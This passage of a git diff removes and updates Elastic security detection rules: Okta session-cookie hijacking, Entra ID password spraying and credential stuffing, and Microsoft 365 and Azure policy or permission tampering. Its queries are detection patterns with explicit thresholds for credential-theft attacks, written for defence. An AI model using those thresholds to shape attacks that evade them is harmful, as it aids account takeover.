false positive, consider resetting passwords for the users involved and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n 
- If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n // ignore authentication events where session and device token hash change often\n AND NOT event.action IN (\n \"policy.evaluate_sign_on\",\n \"user.session.start\",\n \"user.authentication.sso\"\n )\n // ignore Okta system events and only allow registered users\n AND (\n okta.actor.alternate_id != \"system@okta.com\"\n AND okta.actor.alternate_id RLIKE \"[^@\\\\s]+\\\\@[^@\\\\s]+\"\n )\n AND okta.authentication_context.external_session_id != \"unknown\"\n| KEEP event.action, okta.actor.alternate_id, okta.authentication_context.external_session_id, okta.debug_context.debug_data.dt_hash\n| STATS\n dt_hash_counts = COUNT_DISTINCT(okta.debug_context.debug_data.dt_hash) BY\n okta.actor.alternate_id,\n okta.authentication_context.external_session_id\n| WHERE\n dt_hash_counts >= 2\n| SORT\n dt_hash_counts DESC\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://support.okta.com/help/s/article/session-hijacking-attack-definition-damage-defense?language=en_US", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 47, - "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd", - "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Credential Access", - "Domain: SaaS", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1539", - "name": "Steal Web Session Cookie", - "reference": "https://attack.mitre.org/techniques/T1539/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 305 - }, - "id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd_305", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json index 56084a830e8..88143075e20 100644 --- a/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json +++ b/packages/security_detection_engine/kibana/security_rule/cc382a2e-7e52-11ee-9aac-f661ea17fbcd_308.json @@ -19,6 +19,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": 
"^3.0.0" + } + ], "risk_score": 47, "rule_id": "cc382a2e-7e52-11ee-9aac-f661ea17fbcd", "setup": "## Setup\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", diff --git a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json deleted file mode 100644 index 9ba042c2904..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_2.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential brute-force attacks targeting user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to applications integrated with Entra ID or to compromise valid user accounts.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." - ], - "from": "now-60m", - "interval": "15m", - "language": "esql", - "license": "Elastic License v2", - "name": "Microsoft Entra ID Sign-In Brute Force Activity", - "note": "## Triage and analysis\n\n### Investigating Microsoft Entra ID Sign-In Brute Force Activity\n\nThis rule detects brute-force authentication activity in Entra ID sign-in logs. It classifies failed sign-in attempts into behavior types such as password spraying, credential stuffing, or password guessing. 
The classification (`bf_type`) helps prioritize triage and incident response.\n\n### Possible investigation steps\n\n- Review `bf_type`: Determines the brute-force technique being used (`password_spraying`, `credential_stuffing`, or `password_guessing`).\n- Examine `user_id_list`: Identify if high-value accounts (e.g., administrators, service principals, federated identities) are being targeted.\n- Review `login_errors`: Repetitive error types like `\"Invalid Grant\"` or `\"User Not Found\"` suggest automated attacks.\n- Check `ip_list` and `source_orgs`: Investigate if the activity originates from suspicious infrastructure (VPNs, hosting providers, etc.).\n- Validate `unique_ips` and `countries`: Geographic diversity and IP volume may indicate distributed or botnet-based attacks.\n- Compare `total_attempts` vs `duration_seconds`: High rate of failures in a short time period implies automation.\n- Analyze `user_agent.original` and `device_detail_browser`: User agents like `curl`, `Python`, or generic libraries may indicate scripting tools.\n- Investigate `client_app_display_name` and `incoming_token_type`: Detect potential abuse of legacy or unattended login mechanisms.\n- Inspect `target_resource_display_name`: Understand what application or resource the attacker is trying to access.\n- Pivot using `session_id` and `device_detail_device_id`: Determine if a device is targeting multiple accounts.\n- Review `conditional_access_status`: If not enforced, ensure Conditional Access policies are scoped correctly.\n\n### False positive analysis\n\n- Legitimate automation (e.g., misconfigured scripts, sync processes) can trigger repeated failures.\n- Internal red team activity or penetration tests may mimic brute-force behaviors.\n- Certain service accounts or mobile clients may generate repetitive sign-in noise if not properly configured.\n\n### Response and remediation\n\n- Notify your identity security team for further analysis.\n- Investigate and lock or reset impacted accounts if compromise is suspected.\n- Block offending IPs or ASNs at the firewall, proxy, or using Conditional Access.\n- Confirm MFA and Conditional Access are enforced for all user types.\n- Audit targeted accounts for credential reuse across services.\n- Implement account lockout or throttling for failed sign-in attempts where possible.\n", - "query": "FROM logs-azure.signinlogs*\n\n// Define a time window for grouping and maintain the original event timestamp\n| EVAL\n time_window = DATE_TRUNC(15 minutes, @timestamp),\n event_time = @timestamp\n\n// Filter relevant failed authentication events with specific error codes\n| WHERE event.dataset == \"azure.signinlogs\"\n AND event.category == \"authentication\"\n AND azure.signinlogs.category IN (\"NonInteractiveUserSignInLogs\", \"SignInLogs\")\n AND event.outcome == \"failure\"\n AND azure.signinlogs.properties.authentication_requirement == \"singleFactorAuthentication\"\n AND azure.signinlogs.properties.status.error_code IN (\n 50034, // UserAccountNotFound\n 50126, // InvalidUsernameOrPassword\n 50055, // PasswordExpired\n 50056, // InvalidPassword\n 50057, // UserDisabled\n 50064, // CredentialValidationFailure\n 50076, // MFARequiredButNotPassed\n 50079, // MFARegistrationRequired\n 50105, // EntitlementGrantsNotFound\n 70000, // InvalidGrant\n 70008, // ExpiredOrRevokedRefreshToken\n 70043, // BadTokenDueToSignInFrequency\n 80002, // OnPremisePasswordValidatorRequestTimedOut\n 80005, // OnPremisePasswordValidatorUnpredictableWebException\n 50144, // 
InvalidPasswordExpiredOnPremPassword\n 50135, // PasswordChangeCompromisedPassword\n 50142, // PasswordChangeRequiredConditionalAccess\n 120000, // PasswordChangeIncorrectCurrentPassword\n 120002, // PasswordChangeInvalidNewPasswordWeak\n 120020 // PasswordChangeFailure\n )\n AND azure.signinlogs.properties.user_principal_name IS NOT NULL AND azure.signinlogs.properties.user_principal_name != \"\"\n AND user_agent.original != \"Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0\"\n AND source.`as`.organization.name != \"MICROSOFT-CORP-MSN-AS-BLOCK\"\n\n// Aggregate statistics for behavioral pattern analysis\n| STATS\n authentication_requirement = VALUES(azure.signinlogs.properties.authentication_requirement),\n client_app_id = VALUES(azure.signinlogs.properties.app_id),\n client_app_display_name = VALUES(azure.signinlogs.properties.app_display_name),\n target_resource_id = VALUES(azure.signinlogs.properties.resource_id),\n target_resource_display_name = VALUES(azure.signinlogs.properties.resource_display_name),\n conditional_access_status = VALUES(azure.signinlogs.properties.conditional_access_status),\n device_detail_browser = VALUES(azure.signinlogs.properties.device_detail.browser),\n device_detail_device_id = VALUES(azure.signinlogs.properties.device_detail.device_id),\n device_detail_operating_system = VALUES(azure.signinlogs.properties.device_detail.operating_system),\n incoming_token_type = VALUES(azure.signinlogs.properties.incoming_token_type),\n risk_state = VALUES(azure.signinlogs.properties.risk_state),\n session_id = VALUES(azure.signinlogs.properties.session_id),\n user_id = VALUES(azure.signinlogs.properties.user_id),\n user_principal_name = VALUES(azure.signinlogs.properties.user_principal_name),\n result_description = VALUES(azure.signinlogs.result_description),\n result_signature = VALUES(azure.signinlogs.result_signature),\n result_type = VALUES(azure.signinlogs.result_type),\n\n unique_users = COUNT_DISTINCT(azure.signinlogs.properties.user_id),\n user_id_list = VALUES(azure.signinlogs.properties.user_id),\n login_errors = VALUES(azure.signinlogs.result_description),\n unique_login_errors = COUNT_DISTINCT(azure.signinlogs.result_description),\n error_codes = VALUES(azure.signinlogs.properties.status.error_code),\n unique_error_codes = COUNT_DISTINCT(azure.signinlogs.properties.status.error_code),\n request_types = VALUES(azure.signinlogs.properties.incoming_token_type),\n app_names = VALUES(azure.signinlogs.properties.app_display_name),\n ip_list = VALUES(source.ip),\n unique_ips = COUNT_DISTINCT(source.ip),\n source_orgs = VALUES(source.`as`.organization.name),\n countries = VALUES(source.geo.country_name),\n unique_country_count = COUNT_DISTINCT(source.geo.country_name),\n unique_asn_orgs = COUNT_DISTINCT(source.`as`.organization.name),\n first_seen = MIN(@timestamp),\n last_seen = MAX(@timestamp),\n total_attempts = COUNT()\nBY time_window\n\n// Determine brute force behavior type based on statistical thresholds\n| EVAL\n duration_seconds = DATE_DIFF(\"seconds\", first_seen, last_seen),\n bf_type = CASE(\n // Many users, relatively few distinct login errors, distributed over multiple IPs (but not too many),\n // and happens quickly. Often bots using leaked credentials.\n unique_users >= 10 AND total_attempts >= 30 AND unique_login_errors <= 3\n AND unique_ips >= 5\n AND duration_seconds <= 600\n AND unique_users > unique_ips,\n \"credential_stuffing\",\n\n // One password against many users. 
Single error (e.g., \"InvalidPassword\"), not necessarily fast.\n unique_users >= 15 AND unique_login_errors == 1 AND total_attempts >= 15 AND duration_seconds <= 1800,\n \"password_spraying\",\n\n // One user targeted repeatedly (same error), OR extremely noisy pattern from many IPs.\n (unique_users == 1 AND unique_login_errors == 1 AND total_attempts >= 30 AND duration_seconds <= 300)\n OR (unique_users <= 3 AND unique_ips > 30 AND total_attempts >= 100),\n \"password_guessing\",\n\n // everything else\n \"other\"\n )\n\n// Only keep columns necessary for detection output/reporting\n| KEEP\n time_window, bf_type, duration_seconds, total_attempts, first_seen, last_seen,\n unique_users, user_id_list, login_errors, unique_login_errors,\n unique_error_codes, error_codes, request_types, app_names,\n ip_list, unique_ips, source_orgs, countries,\n unique_country_count, unique_asn_orgs,\n authentication_requirement, client_app_id, client_app_display_name,\n target_resource_id, target_resource_display_name, conditional_access_status,\n device_detail_browser, device_detail_device_id, device_detail_operating_system,\n incoming_token_type, risk_state, session_id, user_id,\n user_principal_name, result_description, result_signature, result_type\n\n// Remove anything not classified as credential attack activity\n| WHERE bf_type != \"other\"\n", - "references": [ - "https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/", - "https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying", - "https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray", - "https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties", - "https://securityscorecard.com/research/massive-botnet-targets-m365-with-stealthy-password-spraying-attacks/", - "https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes", - "https://github.com/0xZDH/Omnispray", - "https://github.com/0xZDH/o365spray" - ], - "risk_score": 47, - "rule_id": "cca64114-fb8b-11ef-86e2-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - }, - { - "id": "T1110.004", - "name": "Credential Stuffing", - "reference": "https://attack.mitre.org/techniques/T1110/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "cca64114-fb8b-11ef-86e2-f661ea17fbce_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json 
b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json index c144faaec05..01b8d69452f 100644 --- a/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json +++ b/packages/security_detection_engine/kibana/security_rule/cca64114-fb8b-11ef-86e2-f661ea17fbce_5.json @@ -25,6 +25,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 47, "rule_id": "cca64114-fb8b-11ef-86e2-f661ea17fbce", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json deleted file mode 100644 index 42cec551f00..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", - "false_positives": [ - "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Anti-Phish Policy Deletion\n\nMicrosoft 365's anti-phishing policies enhance security by fine-tuning detection settings to thwart phishing attacks. Adversaries may delete these policies to weaken defenses, facilitating unauthorized access. 
The detection rule monitors audit logs for successful deletions of anti-phishing policies, signaling potential malicious activity by identifying specific actions and outcomes associated with policy removal.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-AntiPhishPolicy\" to identify the user account responsible for the deletion.\n- Check the event.outcome field to confirm the success of the policy deletion and gather additional context from related logs around the same timestamp.\n- Investigate the user account's recent activities in Microsoft 365 to identify any other suspicious actions or anomalies, such as unusual login locations or times.\n- Assess whether the user account has been compromised by checking for any unauthorized access attempts or changes in account settings.\n- Evaluate the impact of the deleted anti-phishing policy by reviewing the organization's current phishing protection measures and any recent phishing incidents.\n- Coordinate with the IT security team to determine if the policy deletion was authorized or part of a legitimate change management process.\n\n### False positive analysis\n\n- Routine administrative actions may trigger the rule if IT staff regularly update or remove outdated anti-phishing policies. To manage this, create exceptions for known administrative accounts performing these actions.\n- Scheduled policy reviews might involve the removal of policies as part of a legitimate update process. Document these schedules and exclude them from triggering alerts by setting time-based exceptions.\n- Automated scripts used for policy management can inadvertently cause false positives. Identify and whitelist these scripts to prevent unnecessary alerts.\n- Changes in organizational policy that require the removal of certain anti-phishing policies can be mistaken for malicious activity. Ensure that such changes are communicated and logged, and adjust the rule to recognize these legitimate actions.\n- Test environments where policies are frequently added and removed for validation purposes can generate false positives. 
Exclude these environments from the rule to avoid confusion.\n\n### Response and remediation\n\n- Immediately isolate the affected user accounts and systems to prevent further unauthorized access or data exfiltration.\n- Recreate the deleted anti-phishing policy using the latest security guidelines and ensure it is applied across all relevant user groups.\n- Conduct a thorough review of recent email activity and logs for the affected accounts to identify any phishing emails that may have bypassed security measures.\n- Reset passwords for affected accounts and enforce multi-factor authentication (MFA) to enhance account security.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Escalate the incident to the incident response team if there is evidence of broader compromise or if sensitive data has been accessed.\n- Implement enhanced monitoring and alerting for similar actions in the future to quickly detect and respond to any further attempts to delete security policies.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json deleted file mode 100644 index ac10f93e622..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. 
This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection.", - "false_positives": [ - "A malware filter policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "from": "now-30m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Exchange Malware Filter Policy Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Exchange Malware Filter Policy Deletion\n\nMicrosoft 365 Exchange uses malware filter policies to detect and alert administrators about malware in emails, crucial for maintaining security. Adversaries may delete these policies to bypass detection, facilitating undetected malware distribution. The detection rule monitors audit logs for successful deletions of these policies, signaling potential defense evasion attempts.\n\n### Possible investigation steps\n\n- Review the audit logs for the specific event.action \"Remove-MalwareFilterPolicy\" to identify the user account responsible for the deletion.\n- Investigate the event.outcome to confirm the success of the policy deletion and gather additional context from related logs.\n- Check the event.provider \"Exchange\" and event.category \"web\" to ensure the activity is consistent with expected administrative actions.\n- Assess the recent activity of the identified user account for any unusual behavior or signs of compromise, such as unexpected login locations or times.\n- Examine other security alerts or incidents involving the same user account or related systems to identify potential patterns or coordinated attacks.\n- Verify if there are any recent changes in permissions or roles for the user account that could explain the ability to delete the malware filter policy.\n- Coordinate with IT and security teams to determine if the deletion was authorized or if immediate remediation actions are necessary to restore security controls.\n\n### False positive analysis\n\n- Administrative maintenance activities may trigger the rule if administrators are legitimately updating or removing outdated malware filter policies. To manage this, maintain a log of scheduled maintenance activities and cross-reference with alerts to verify legitimacy.\n- Automated scripts or third-party tools used for policy management might inadvertently delete policies, leading to false positives. Ensure these tools are configured correctly and consider excluding their actions from the rule if they are verified as non-threatening.\n- Changes in organizational policy or security strategy might necessitate the removal of certain malware filter policies. Document these changes and create exceptions in the detection rule for these specific actions to prevent unnecessary alerts.\n- User error during policy management could result in accidental deletions. 
Implement additional verification steps or approval processes for policy deletions to reduce the likelihood of such errors triggering false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected account or system to prevent further unauthorized actions or malware distribution.\n- Recreate the deleted malware filter policy to restore the email security posture and prevent further evasion attempts.\n- Conduct a thorough review of recent audit logs to identify any other suspicious activities or policy changes that may indicate a broader compromise.\n- Reset passwords and enforce multi-factor authentication for the affected account to secure access and prevent further unauthorized actions.\n- Notify the security team and relevant stakeholders about the incident for awareness and potential escalation if further investigation reveals a larger threat.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activities or attempts to bypass security measures.\n- Review and update security policies and configurations to ensure they are robust against similar evasion tactics in the future.", - "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-MalwareFilterPolicy\" and event.outcome:success\n", - "references": [ - "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-malwarefilterpolicy?view=exchange-ps" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "d743ff2a-203e-4a46-a3e3-40512cfe8fbb_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json deleted file mode 100644 index 190b0015e75..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_105.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Austin Songer" - ], - "description": "Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. 
An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss.", - "false_positives": [ - "Blob permissions may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." - ], - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Blob Permissions Modification", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Blob Permissions Modification\n\nAzure Blob Storage is a service for storing large amounts of unstructured data. It uses Azure RBAC to manage access, ensuring only authorized users can modify or access data. Adversaries may exploit this by altering permissions to gain unauthorized access or disrupt operations. The detection rule monitors specific Azure activity logs for successful permission changes, alerting analysts to potential security breaches or misconfigurations.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the user or service principal associated with the permission modification event by examining the relevant fields such as `event.dataset` and `azure.activitylogs.operation_name`.\n- Check the `event.outcome` field to confirm the success of the permission modification and gather details on the specific permissions that were altered.\n- Investigate the context of the modification by reviewing recent activities of the identified user or service principal to determine if the change aligns with their typical behavior or role.\n- Assess the potential impact of the permission change on the affected Azure Blob by evaluating the sensitivity of the data and the new access levels granted.\n- Cross-reference the modification event with any recent security alerts or incidents to identify if this change is part of a broader attack pattern or misconfiguration issue.\n- Consult with the relevant data owners or administrators to verify if the permission change was authorized and necessary, and if not, take corrective actions to revert the changes.\n\n### False positive analysis\n\n- Routine administrative changes to Azure Blob permissions by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that frequently perform legitimate permission modifications.\n- Automated scripts or tools used for regular maintenance or deployment might modify permissions as part of their operation. Identify these scripts and exclude their activity from triggering alerts by using specific identifiers or tags associated with the scripts.\n- Scheduled updates or policy changes that involve permission modifications can result in false positives. Document these schedules and adjust the monitoring rules to account for these timeframes, reducing unnecessary alerts.\n- Integration with third-party services that require permission changes might cause alerts. 
Review and whitelist these services if they are verified and necessary for operations, ensuring they do not trigger false positives.\n\n### Response and remediation\n\n- Immediately revoke any unauthorized permissions identified in the Azure Blob Storage to prevent further unauthorized access or data exposure.\n- Conduct a thorough review of the Azure Activity Logs to identify any other suspicious activities or permission changes that may have occurred around the same time.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized changes and any potential data exposure.\n- Implement additional monitoring on the affected Azure Blob Storage accounts to detect any further unauthorized access attempts or permission modifications.\n- Escalate the incident to the incident response team if there is evidence of a broader security breach or if sensitive data has been compromised.\n- Review and update Azure RBAC policies to ensure that only necessary permissions are granted, and consider implementing more granular access controls to minimize the risk of future unauthorized modifications.\n- Conduct a post-incident analysis to identify the root cause of the permission change and implement measures to prevent similar incidents in the future, such as enhancing logging and alerting capabilities.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION\" or\n \"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION\") and\n event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "d79c4b2a-6134-4edd-86e6-564a92a933f9", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1222", - "name": "File and Directory Permissions Modification", - "reference": "https://attack.mitre.org/techniques/T1222/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 105 - }, - "id": "d79c4b2a-6134-4edd-86e6-564a92a933f9_105", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d8f4e3b0-8a1b-11ef-9b4a-f661ea17fbce_1.json 